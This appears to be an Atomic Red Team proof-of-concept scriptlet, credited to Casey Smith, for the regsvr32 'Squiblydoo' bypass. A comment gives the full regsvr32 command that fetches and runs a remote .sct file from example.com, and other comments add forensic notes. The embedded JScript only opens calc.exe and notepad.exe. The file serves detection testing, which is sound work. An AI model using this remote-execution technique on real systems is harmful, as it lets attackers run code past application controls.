44 lines
1.1 KiB
Plaintext
44 lines
1.1 KiB
Plaintext
|
<?XML version="1.0"?>
|
||
|
<scriptlet>
|
||
|
|
||
|
<registration
|
||
|
description="Bandit"
|
||
|
progid="Bandit"
|
||
|
version="1.00"
|
||
|
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||
|
>
|
||
|
|
||
|
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||
|
<!-- DFIR -->
|
||
|
<!-- .sct files are downloaded and executed from a path like this -->
|
||
|
<!-- Though, the name and extension are arbitary.. -->
|
||
|
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||
|
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||
|
|
||
|
|
||
|
<!-- Proof Of Concept - Casey Smith @subTee -->
|
||
|
<!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
|
||
|
<script language="JScript">
|
||
|
<![CDATA[
|
||
|
|
||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||
|
|
||
|
]]>
|
||
|
</script>
|
||
|
</registration>
|
||
|
|
||
|
<public>
|
||
|
<method name="Exec"></method>
|
||
|
</public>
|
||
|
<script language="JScript">
|
||
|
<![CDATA[
|
||
|
|
||
|
function Exec()
|
||
|
{
|
||
|
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
|
||
|
}
|
||
|
|
||
|
]]>
|
||
|
</script>
|
||
|
|
||
|
</scriptlet>
|